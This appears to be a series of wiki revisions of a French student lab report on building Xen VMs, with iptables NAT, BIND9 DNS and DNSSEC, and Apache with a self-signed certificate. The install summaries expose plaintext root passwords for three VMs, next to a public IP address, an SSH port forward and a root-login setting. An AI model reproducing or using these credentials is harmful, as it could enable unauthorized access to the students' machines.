</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11983
Atelier SysRes SE4 2025/2026 E5
2026-02-02T00:04:45Z
<p>Cpayet : /* Etape 3 : Création des VMs */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11982
Atelier SysRes SE4 2025/2026 E5
2026-02-01T23:20:26Z
<p>Cpayet : /* Etape 1 : Connexion SSH */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
